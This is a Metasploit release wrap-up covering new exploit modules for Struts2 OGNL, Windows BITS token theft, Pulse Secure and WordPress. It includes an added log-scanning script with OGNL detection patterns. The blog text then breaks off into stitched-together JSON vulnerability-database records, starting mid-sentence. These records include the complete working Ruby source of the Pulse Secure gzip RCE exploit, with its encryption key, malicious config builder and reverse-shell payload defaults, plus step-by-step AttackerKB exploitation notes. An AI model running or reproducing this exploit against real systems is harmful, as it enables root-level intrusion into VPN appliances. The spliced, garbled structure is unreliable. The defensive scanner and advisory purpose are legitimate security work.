## Struts2 Multi Eval OGNL RCE

Our very own [zeroSteiner](<https://github.com/zeroSteiner>) added [`exploit/multi/http/struts2_multi_eval_ognl`](<https://github.com/rapid7/metasploit-framework/pull/14521>), which exploits Struts2 evaluating OGNL expressions in HTML attributes multiple times ([CVE-2019-0230](<https://attackerkb.com/topics/mcp2xl4Va9/cve-2019-0230?referrer=blog>) and [CVE-2020-17530](<https://attackerkb.com/topics/LdoHePCiRm/cve-2020-17530?referrer=blog>)). The [CVE-2019-0230](<https://attackerkb.com/topics/mcp2xl4Va9/cve-2019-0230?referrer=blog>) OGNL chain for remote code execution requires a one-time chain to enable the RCE gadget, which the module handles automatically. The OGNL gadget chain for [CVE-2020-17530](<https://attackerkb.com/topics/LdoHePCiRm/cve-2020-17530?referrer=blog>) echoes the command output. Both chains use a simple mathematical expression to confirm that evaluation occurs. These vulnerabilities are application dependent, so the user does need to know which CVE they are targeting. Setting the `NAME` parameter appropriately and using the check method to confirm that evaluation takes place inside an HTML attribute are key to successful exploitation.
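From the defender's side, the same evaluation signal the module's check relies on (an arithmetic expression wrapped in `%{...}` in a tag-attribute parameter) is what a log review should look for. The script below is an added example for this wrap-up, not code from the Metasploit module or from Rapid7; the access-log lines are constructed, the parameter name `id` mirrors the module's default `NAME`, and the token list is an assumption drawn from the internals the public chains reference.

```python
"""Flag HTTP requests carrying OGNL expressions in Struts tag-attribute
parameters (the CVE-2019-0230 / CVE-2020-17530 double-evaluation pattern).

Added example, not code from the Metasploit module. Sample log lines are
constructed. CVE-2020-17530 is exercised over POST form data, which plain
access logs do not record, so scan_request() also accepts a request body
(e.g. from a WAF or reverse-proxy request log)."""
import re
from urllib.parse import parse_qsl, urlsplit

# OGNL internals referenced by the publicly documented chains (assumed list).
SUSPICIOUS_TOKENS = (
    "#context", "#attr", "#application", "#container",
    "@java.lang.Runtime", "OgnlUtil", "setExcludedClasses",
    "setExcludedPackageNames", "DEFAULT_MEMBER_ACCESS",
    "InstanceManager", "freemarker.template.utility.Execute",
)

# An arithmetic-only body such as 1234*5678 is the evaluation-check pattern.
ARITH_PROBE = re.compile(r"^\s*\d{1,6}\s*[*+\-]\s*\d{1,6}\s*$")

# Combined-log request line: "METHOD /path?query HTTP/x.y" status
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def extract_expressions(value):
    """Return the bodies of every %{...} / ${...} in value, honouring nested braces."""
    out, i = [], 0
    while i < len(value) - 1:
        if value[i] in "%$" and value[i + 1] == "{":
            depth, j = 0, i + 1
            while j < len(value):
                if value[j] == "{":
                    depth += 1
                elif value[j] == "}":
                    depth -= 1
                    if depth == 0:
                        break
                j += 1
            if depth == 0:
                out.append(value[i + 2:j])
                i = j + 1
                continue
            out.append(value[i + 2:])  # unbalanced: keep the tail, still worth flagging
            break
        i += 1
    return out


def classify_expression(body):
    """'probe' for an arithmetic check, 'gadget' for chain internals, else 'expression'."""
    if ARITH_PROBE.match(body):
        return "probe"
    if any(tok in body for tok in SUSPICIOUS_TOKENS):
        return "gadget"
    return "expression"


def scan_request(method, target, body=""):
    """Inspect the query string (GET) and, for POST, the form body for OGNL expressions."""
    findings = []
    sources = [("query", urlsplit(target).query)]
    if method.upper() == "POST" and body:
        sources.append(("body", body))
    for where, raw in sources:
        # parse_qsl percent-decodes, so %25%7B becomes %{ before we look at it.
        for name, value in parse_qsl(raw, keep_blank_values=True):
            for expr in extract_expressions(value):
                findings.append({"where": where, "param": name,
                                 "kind": classify_expression(expr)})
    return findings


def scan_access_log(lines):
    """Return [(line_number, findings)] for log lines that carry OGNL expressions."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.search(line)
        if not m:
            continue
        findings = scan_request(m.group("method"), m.group("target"))
        if findings:
            hits.append((n, findings))
    return hits


# Constructed sample: a benign request, an evaluation probe, and a chain fragment.
SAMPLE_LOG = [
    '10.0.0.5 - - [08/Jan/2021:10:00:00 +0000] "GET /app/index.action?id=42 HTTP/1.1" 200 512',
    '10.0.0.5 - - [08/Jan/2021:10:00:01 +0000] "GET /app/index.action?id=%25%7B1234*5678%7D HTTP/1.1" 200 512',
    '10.0.0.5 - - [08/Jan/2021:10:00:02 +0000] "GET /app/index.action?id=%25%7B(%23context%3D%23attr%5B%27struts.valueStack%27%5D.context)%7D HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for line_no, findings in scan_access_log(SAMPLE_LOG):
        print(line_no, findings)
```

A probe hit followed within seconds by gadget hits on the same parameter from one client is the sequence the module's check-then-exploit flow produces, and is worth an alert on its own.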
## JuicyPotato-like Windows privilege escalation exploit
Exploit module [`exploits/windows/local/bits_ntlm_token_impersonation`](<https://github.com/rapid7/metasploit-framework/pull/14046>) was added by Metasploit contributor [C4ssandre](<https://github.com/C4ssandre>). It exploits BITS connecting to a local Windows Remote Management (WinRM) server at startup time. A fake WinRM server listening on port `5985` is started by a `DLL` loaded from an existing unprivileged Meterpreter session. The fake server triggers BITS and then steals a `SYSTEM` token from the subsequent authentication request. The token is then used to start a new process and launch `powershell.exe` as the `SYSTEM` user, which downloads a PowerShell script from a second local HTTP server and executes it without writing any files to disk. The exploit is based on [decoder's PoC](<https://decoder.cloud/2019/12/06/we-thought-they-were-potatoes-but-they-were-beans/>). It has been successfully tested on Windows 10 (10.0 Build 19041) 32-bit.
## Pulse Connect Secure Gzip RCE
Metasploit contributor [h00die](<https://github.com/h00die>) added an [exploit](<https://github.com/rapid7/metasploit-framework/pull/14368>) that targets Pulse Connect Secure server version `9.1R8` and earlier. The vulnerability was originally discovered by the [NCC Group](<https://research.nccgroup.com/2020/10/26/technical-advisory-pulse-connect-secure-rce-via-uncontrolled-gzip-extraction-cve-2020-8260/>). It achieves authenticated remote code execution as `root` by uploading an encrypted config that contains an overwrite for a Perl template file. This module was made possible by [rxwx](<https://github.com/rxrx>), who shared the encryption code with the author. Admin credentials are required for successful `root` access. The module has been tested against server version `9.1R8`.
## New modules (8)
* [SpamTitan Unauthenticated RCE](<https://github.com/rapid7/metasploit-framework/pull/14330>) by [Christophe De La Fuente](<https://github.com/cdelafuente-r7>) and [Felipe Molina](<https://github.com/felmoltor>), which exploits [CVE-2020-11698](<https://attackerkb.com/topics/ZM17ZOD4ym/cve-2020-11698?referrer=blog>)
* [Pulse Secure VPN gzip RCE](<https://github.com/rapid7/metasploit-framework/pull/14368>) by [David Cash](<https://research.nccgroup.com/author/dcashncc/>), [Richard Warren](<https://uk.linkedin.com/in/rich-warren-437a7841>), [Spencer McIntyre](<https://github.com/zeroSteiner>), and [h00die](<https://github.com/h00die>), which exploits [CVE-2020-8260](<https://attackerkb.com/topics/MToDzANCY4/cve-2020-8260?referrer=blog>)
* [Apache Struts 2 Forced Multi OGNL Evaluation](<https://github.com/rapid7/metasploit-framework/pull/14521>) by [Alvaro Muñoz](<https://github.com/pwntester>), Matthias Kaiser, [Spencer McIntyre](<https://github.com/zeroSteiner>), and [ka1n4t](<https://github.com/ka1n4t>), which exploits [CVE-2020-17530](<https://attackerkb.com/topics/LdoHePCiRm/cve-2020-17530?referrer=blog>) and [CVE-2019-0230](<https://attackerkb.com/topics/mcp2xl4Va9/cve-2019-0230?referrer=blog>)
* [SYSTEM token impersonation through NTLM bits authentication on missing WinRM Service.](<https://github.com/rapid7/metasploit-framework/pull/14046>) by Andrea Pierini ([decoder](<https://github.com/decoder>)), Antonio Cocomazzi (splinter_code), [Cassandre](<https://github.com/C4ssandre>), and Roberto ([0xea31](<https://github.com/0xea31>))
* [Shodan Host Port](<https://github.com/rapid7/metasploit-framework/pull/14429>) by [natto97](<https://github.com/natto97>)
* [WordPress Duplicator File Read Vulnerability](<https://github.com/rapid7/metasploit-framework/pull/14497>) by Hoa Nguyen - SunCSR Team and Ramuel Gall, which exploits [CVE-2020-11738](<https://attackerkb.com/topics/judia21wRt/cve-2020-11738?referrer=blog>)
* [WordPress Easy WP SMTP Password Reset](<https://github.com/rapid7/metasploit-framework/pull/14474>) by [h00die](<https://github.com/h00die>), which exploits [CVE-2020-35234](<https://attackerkb.com/topics/12eb7VUXHR/cve-2020-35234?referrer=blog>)
* [WordPress Total Upkeep Unauthenticated Backup Downloader](<https://github.com/rapid7/metasploit-framework/pull/14568>) by Wadeek and [h00die](<https://github.com/h00die>)
## Enhancements and features
* PR [14566](<https://github.com/rapid7/metasploit-framework/pull/14566>) from [zeroSteiner](<https://github.com/zeroSteiner>) Module `auxiliary/server/socks_proxy` replaces `modules/auxiliary/server/socks4a.rb` and `modules/auxiliary/server/socks5.rb`.
* PR [14538](<https://github.com/rapid7/metasploit-framework/pull/14538>) from [jmartin-r7](<https://github.com/jmartin-r7>) Improves Metasploit's XML importer error messages when data is not Base64 encoded.
* PR [14528](<https://github.com/rapid7/metasploit-framework/pull/14528>) from [zeroSteiner](<https://github.com/zeroSteiner>) Clarifies in the Windows Meterpreter payload descriptions that XP SP2 or newer is supported.
* PR [14522](<https://github.com/rapid7/metasploit-framework/pull/14522>) from [axxop](<https://github.com/axxop>) Replaces the hardcoded default Shiro encryption key with a new datastore option that allows users to specify the rememberMe cookie encryption key.
* PR [14517](<https://github.com/rapid7/metasploit-framework/pull/14517>) from [timwr](<https://github.com/timwr>) Changes the osx/x64/shell_reverse_tcp payload to be generated with Metasm and captures and sends STDERR to msfconsole.
* PR [14509](<https://github.com/rapid7/metasploit-framework/pull/14509>) from [egypt](<https://github.com/egypt>) This adds a Java target to the Apache Solr RCE exploit module and fixes several payload issues.
* PR [14444](<https://github.com/rapid7/metasploit-framework/pull/14444>) from [dwelch-r7](<https://github.com/dwelch-r7>) Adds a couple of methods missing from the remote data services for adding and deleting routes.
## Bugs fixed
* PR [14589](<https://github.com/rapid7/metasploit-framework/pull/14589>) from [timwr](<https://github.com/timwr>) Fixes a file download issue with the Android Meterpreter's download command.
* PR [14532](<https://github.com/rapid7/metasploit-framework/pull/14532>) from [bcoles](<https://github.com/bcoles>) Fixes a NoMethodError exception caused by the Msf::Post::Common mixin not being included in post/android/capture/screen.
* PR [14530](<https://github.com/rapid7/metasploit-framework/pull/14530>) from [jmartin-r7](<https://github.com/jmartin-r7>) Fixes a failing test on macOS caused by IPv6 vs IPv4 result precedence.
* PR [14475](<https://github.com/rapid7/metasploit-framework/pull/14475>) from [dwelch-r7](<https://github.com/dwelch-r7>) Fixes the EICAR canary check.
* PR [14334](<https://github.com/rapid7/metasploit-framework/pull/14334>) from [Summus-git](<https://github.com/Summus-git>) Fixes a socket-closing bug in the x86 Linux bind shell payloads.
## Get it
As always, you can update to the latest Metasploit Framework with `msfupdate`
and you can get more details on the changes since the last blog post from
GitHub:
* [Pull Requests 6.0.22...6.0.25](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222020-12-17T10%3A49%3A21-06%3A00..2021-01-07T10%3A58%3A16%2B00%3A00%22>)
* [Full diff 6.0.22...6.0.25](<https://github.com/rapid7/metasploit-framework/compare/6.0.22...6.0.25>)
If you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest.
To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the
[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).
uncontrolled gzip extraction vulnerability which allows an attacker to overwrite arbitrary files, resulting in Remote Code Execution as root. Admin credentials are required for successful exploitation. Of note, MANY binaries are not in `$PATH`, but are located in `/home/bin/`.\n", "cvss3": {}, "published": "2020-12-07T15:54:20", "type": "metasploit", "title": "Pulse Secure VPN gzip RCE", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-8260"], "modified": "2021-04-12T23:50:31", "id": "MSF:EXPLOIT-LINUX-HTTP-PULSE_SECURE_GZIP_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/pulse_secure_gzip_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n ENCRYPTION_KEY = \"\\x7e\\x95\\x42\\x1a\\x6b\\x88\\x66\\x41\\x43\\x1b\\x32\\xc5\\x24\\x42\\xe2\\xe4\\x83\\xf8\\x1f\\x58\\xb0\\xe9\\xe9\\xa5\".b\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Pulse Secure VPN gzip RCE',\n 'Description' => %q{\n The Pulse Connect Secure appliance before 9.1R9 suffers from an uncontrolled gzip extraction vulnerability\n which allows an attacker to overwrite arbitrary files, resulting in Remote Code Execution as root.\n Admin credentials are required for successful exploitation.\n Of note, MANY binaries are not in `$PATH`, but are located in `/home/bin/`.\n },\n 'Author' => [\n 'h00die', # msf module\n 'Spencer McIntyre', # msf module\n 'Richard Warren <richard.warren@nccgroup.com>', # original PoC, discovery\n 'David Cash <david.cash@nccgroup.com>', # original PoC, discovery\n ],\n 'References' => [\n ['URL', 'https://gist.github.com/rxwx/03a036d8982c9a3cead0c053cf334605'],\n ['URL', 
'https://research.nccgroup.com/2020/10/26/technical-advisory-pulse-connect-secure-rce-via-uncontrolled-gzip-extraction-cve-2020-8260/'],\n ['URL', 'https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601'],\n ['CVE', '2020-8260']\n ],\n 'DisclosureDate' => '2020-10-26',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Unix In-Memory',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_memory,\n 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/generic' }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp' }\n }\n ]\n ],\n 'Payload' => { 'Compat' => { 'ConnectionType' => '-bind' } },\n 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true, 'CMDSTAGER::FLAVOR' => 'curl' },\n 'DefaultTarget' => 1,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK, CONFIG_CHANGES],\n 'RelatedModules' => ['auxiliary/gather/pulse_secure_file_disclosure']\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'The URI of the application', '/']),\n OptString.new('USERNAME', [true, 'The username to login with', 'admin']),\n OptString.new('PASSWORD', [true, 'The password to login with', '123456'])\n ])\n\n register_advanced_options([\n OptFloat.new('CMDSTAGER::DELAY', [ true, 'Delay between command executions', 1.5 ]),\n ])\n end\n\n def check(exploiting: false)\n login\n res = send_request_cgi({ 'uri' => normalize_uri('dana-admin', 'misc', 'admin.cgi') })\n fail_with(Failure::UnexpectedReply, 'Failed to retrieve the version information') unless res&.code == 200\n version = res.body.scan(%r{id=\"span_stats_counter_total_users_count\"[^>]+>([^<(]+)(?:\\(build (\\d+)\\))?</span>})&.last\n 
fail_with(Failure::UnexpectedReply, 'Failed to retrieve the version information') unless version\n version, build = version\n\n return CheckCode::Unknown unless version.include?('R')\n\n version, revision = version.split('R', 2)\n print_status(\"Version #{version.strip}, revision #{revision.strip}, build #{build.strip} found\")\n return CheckCode::Appears if version.to_f <= 9.1 && revision.to_f < 9\n\n CheckCode::Detected\n rescue Msf::Exploit::Failed\n CheckCode::Unknown\n ensure\n logout unless exploiting\n end\n\n def exploit\n case (checkcode = check(exploiting: true))\n when Exploit::CheckCode::Vulnerable, Exploit::CheckCode::Appears\n print_good(checkcode.message)\n when Exploit::CheckCode::Detected\n print_warning(checkcode.message)\n else\n fail_with(Module::Failure::Unknown, checkcode.message.to_s)\n end\n\n case target['Type']\n when :unix_memory\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager(\n linemax: 262144, # 256KiB\n delay: datastore['CMDSTAGER::DELAY']\n )\n end\n\n logout\n end\n\n def execute_command(command, _opts = {})\n trigger = Rex::Text.rand_text_alpha_upper(8)\n print_status(\"Exploit trigger will be at #{normalize_uri('dana-na', 'auth', 'setcookie.cgi')} with a header of #{trigger}\")\n\n config = build_malicious_config(command, trigger)\n res = upload_config(config)\n\n fail_with(Failure::UnexpectedReply, 'File upload failed') unless res&.code == 200\n\n print_status('Triggering RCE')\n send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'dana-na', 'auth', 'setcookie.cgi'),\n 'headers' => { trigger => trigger }\n })\n end\n\n def res_get_xsauth(res)\n res.body.scan(%r{name=\"xsauth\" value=\"([^\"]+)\"/>})&.last&.first\n end\n\n def upload_config(config)\n print_status('Requesting backup config page')\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'dana-admin', 'cached', 'config', 'config.cgi'),\n 'headers' => { 'Referer' => 
\"#{full_uri('/dana-admin/cached/config/config.cgi')}?type=system\" },\n 'vars_get' => { 'type' => 'system' }\n })\n fail_with(Failure::UnexpectedReply, 'Failed to request the backup configuration page') unless res&.code == 200\n xsauth = res_get_xsauth(res)\n fail_with(Failure::UnexpectedReply, 'Failed to get the xsauth token') if xsauth.nil?\n\n post_data = Rex::MIME::Message.new\n post_data.add_part(xsauth, nil, nil, 'form-data; name=\"xsauth\"')\n post_data.add_part('Import', nil, nil, 'form-data; name=\"op\"')\n post_data.add_part('system', nil, nil, 'form-data; name=\"type\"')\n post_data.add_part('8', nil, nil, 'form-data; name=\"optWhat\"')\n post_data.add_part('', nil, nil, 'form-data; name=\"txtPassword1\"')\n post_data.add_part('Import Config', nil, nil, 'form-data; name=\"btnUpload\"')\n post_data.add_part(config, 'application/octet-stream', 'binary', 'form-data; name=\"uploaded_file\"; filename=\"system.cfg\"')\n\n print_status('Uploading encrypted config backup')\n send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'dana-admin', 'cached', 'config', 'import.cgi'),\n 'method' => 'POST',\n 'headers' => { 'Referer' => \"#{full_uri('/dana-admin/cached/config/config.cgi')}?type=system\" },\n 'data' => post_data.to_s,\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\"\n })\n end\n\n def login\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'dana-na', 'auth', 'url_admin', 'login.cgi'),\n 'method' => 'POST',\n 'vars_post' => {\n 'tz_offset' => '-300',\n 'username' => datastore['USERNAME'],\n 'password' => datastore['PASSWORD'],\n 'realm' => 'Admin Users',\n 'btnSubmit' => 'Sign In'\n },\n 'keep_cookies' => true\n })\n\n fail_with(Failure::UnexpectedReply, 'Login failed') unless res&.code == 302\n location = res.headers['Location']\n fail_with(Failure::NoAccess, 'Login failed') if location.include?('failed')\n\n return unless location.include?('admin%2Dconfirm')\n\n # if the account we login with is already logged 
in, or another admin is logged in, a warning is displayed. Click through it.\n print_status('Other admin sessions detected, continuing')\n res = send_request_cgi({ 'uri' => location, 'keep_cookies' => true })\n fail_with(Failure::UnexpectedReply, 'Login failed') unless res&.code == 200\n fds = res.body.scan(/name=\"FormDataStr\" value=\"([^\"]+)\">/).last\n xsauth = res_get_xsauth(res)\n fail_with(Failure::UnexpectedReply, 'Login failed (missing form elements)') unless fds && xsauth\n\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'dana-na', 'auth', 'url_admin', 'login.cgi'),\n 'method' => 'POST',\n 'vars_post' => {\n 'btnContinue' => 'Continue the session',\n 'FormDataStr' => fds.first,\n 'xsauth' => xsauth\n },\n 'keep_cookies' => true\n })\n fail_with(Failure::UnexpectedReply, 'Login failed') unless res\n end\n\n def logout\n print_status('Logging out to prevent warnings to other admins')\n res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'dana-admin', 'cached', 'config', 'config.cgi') })\n fail_with(Failure::UnexpectedReply, 'Logout failed') unless res&.code == 200\n\n logout_uri = res.body.scan(%r{/dana-na/auth/logout\\.cgi\\?xsauth=\\w+}).first\n fail_with(Failure::UnexpectedReply, 'Logout failed') if logout_uri.nil?\n\n res = send_request_cgi({ 'uri' => logout_uri })\n fail_with(Failure::UnexpectedReply, 'Logout failed') unless res&.code == 302\n end\n\n def build_malicious_config(cmd, trigger)\n payload_script = \"#{Rex::Text.rand_text_alphanumeric(rand(6..13))}.sh\"\n perl = <<~PERL\n if (length $ENV{HTTP_#{trigger}}){\n chmod 0775, \"/data/var/runtime/tmp/tt/#{payload_script}\";\n system(\"env /data/var/runtime/tmp/tt/#{payload_script}\");\n }\n PERL\n tarfile = StringIO.new\n Rex::Tar::Writer.new(tarfile) do |tar|\n tar.mkdir('tmp', 509)\n tar.mkdir('tmp/tt', 509)\n tar.add_file('tmp/tt/setcookie.thtml.ttc', 511) do |tio|\n tio.write perl\n end\n tar.add_file(\"tmp/tt/#{payload_script}\", 511) do |tio|\n tio.write 
\"PATH=/home/bin:$PATH\\n\"\n tio.write \"rm -- \\\"$0\\\"\\n\"\n tio.write cmd\n end\n end\n\n gzfile = StringIO.new\n gz = Zlib::GzipWriter.new(gzfile)\n gz.write(tarfile.string)\n gz.close\n\n encrypt_config(gzfile.string)\n end\n\n def encrypt_config(config_blob)\n cipher = OpenSSL::Cipher.new('DES-EDE3-CFB').encrypt\n iv = cipher.iv = cipher.random_iv\n cipher.key = ENCRYPTION_KEY\n\n md5 = OpenSSL::Digest.new('MD5', \"#{iv}\\x00#{[config_blob.length].pack('V')}\")\n\n ciphertext = cipher.update(config_blob)\n ciphertext << cipher.final\n md5 << ciphertext\n\n cipher.reset\n \"\\x09#{iv}\\x00#{[ciphertext.length].pack('V') + ciphertext + cipher.update(md5.digest) + cipher.final}\"\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/pulse_secure_gzip_rce.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "attackerkb": [{"lastseen": "2021-07-20T23:33:10", "description": "Forced OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution. Affected software : Apache Struts 2.0.0 \u2013 Struts 2.5.25.\n\n \n**Recent assessments:** \n \n**wvu-r7** at December 08, 2020 6:53pm UTC reported:\n\nSee my [assessment](<https://attackerkb.com/assessments/92642728-1fa2-4a4e-9750-297f18f0cc0b>) on [CVE-2019-0230](<https://attackerkb.com/topics/mcp2xl4Va9/cve-2019-0230>). 
[Apache themselves](<https://cwiki.apache.org/confluence/display/WW/S2-061>) said this is similar to [S2-059](<https://cwiki.apache.org/confluence/display/WW/S2-059>).\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 2\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-11T00:00:00", "type": "attackerkb", "title": "CVE-2020-17530", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2020-17530"], "modified": "2020-12-15T00:00:00", "id": "AKB:CF76EF1F-CB59-4A29-ADB1-DA37C695142B", "href": "https://attackerkb.com/topics/LdoHePCiRm/cve-2020-17530", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-06T15:10:30", "description": "The easy-wp-smtp plugin before 1.4.4 for WordPress allows Administrator account takeover, as exploited in the wild in December 2020. If an attacker can list the wp-content/plugins/easy-wp-smtp/ directory, then they can discover a log file (such as #############_debug_log.txt) that contains all password-reset links. 
The attacker can request a reset of the Administrator password and then use a link found there.\n\n \n**Recent assessments:** \n \n**h00die** at January 18, 2021 3:11pm UTC reported:\n\nThis is a rather neat vulnerability IMO.\n\nEasy WP SMTP versions <= 1.4.2 have a non-default `debug` option. When set, the WordPress plugin creates a `[a-z0-9]{5,15}_debug_log.txt` file in the `wp-content/plugins/easy-wp-smtp/` directory. Problem is, this folder allows directory listings, so the file can easily be accessed. The debug log file contains SMTP logs for the WordPress instance.\n\nThe attack chain is as follows:\n\n 1. find the debug_log file \n\n 2. request a password reset for an account \n\n 3. read the debug_log file, which will have the password reset link for that user \n\n 4. use the link to change the password for that user. \n\n\nPretty easy to exploit, but not necessarily in an automated way since the password change may have unknown requirements. Easy to do manually though!\n\nThe file may also contain creds for the SMTP server!\n\n<https://github.com/rapid7/metasploit-framework/pull/14474>\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-12-14T00:00:00", "type": "attackerkb", "title": "CVE-2020-35234", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", 
"integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-35234"], "modified": "2020-12-16T00:00:00", "id": "AKB:A93881E2-CFB7-49E3-81CF-664913BEA12E", "href": "https://attackerkb.com/topics/12eb7VUXHR/cve-2020-35234", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-06-06T15:07:45", "description": "The Snap Creek Duplicator plugin before 1.3.28 for WordPress (and Duplicator Pro before 3.8.7.1) allows Directory Traversal via ../ in the file parameter to duplicator_download or duplicator_init.\n\n \n**Recent assessments:** \n \n**kevthehermit** at April 14, 2020 2:38pm UTC reported:\n\nThis plugin is recorded as having over 1 million installations via WordPress \u2013 <https://wordpress.org/plugins/duplicator/> \nIt has a free and a pro version, with both being impacted.\n\nOther reporting suggests that there are around 170,000 active installations, with ~150,000 of these not on the latest version.\n\nThe vulnerability allows arbitrary file read of any file on disk in the context of the web application. This kind of attack _can_ lead to further compromise depending on its setup and configuration. 
Using this level of access can lead to database credentials being compromised, which in turn can lead to further exploitation.\n\nThis exploit has been seen in active campaigns as reported by Wordfence \u2013 <https://www.wordfence.com/blog/2020/02/active-attack-on-recently-patched-duplicator-plugin-vulnerability-affects-over-1-million-sites/>\n\nIOCs shared by WordPress and replicated here for ease of discovery.\n\nIndicators Of Compromise (IOCs) \nThe following Indicators of Compromise (IOCs) can be used to determine if your site may have been attacked.\n\nTraffic logged from the threat actor\u2019s IP address should be considered suspicious:\n\n * 77.71.115.52 \n\n * Attacks in this campaign are issued via GET requests with the following query strings: \n\n   * action=duplicator_download \n\n   * file=/../wp-config.php \n\n   * Note: Because this vulnerability can be exploited via WP AJAX, it\u2019s possible to exploit via POST request. In this case, it\u2019s possible for the action parameter to be passed in the POST body instead of the query string. This will prevent the action=duplicator_download string from appearing in HTTP logs. 
The file parameter must be passed as a query string, however, and is a reliable indicator.\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-04-13T00:00:00", "type": "attackerkb", "title": "CVE-2020-11738", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": 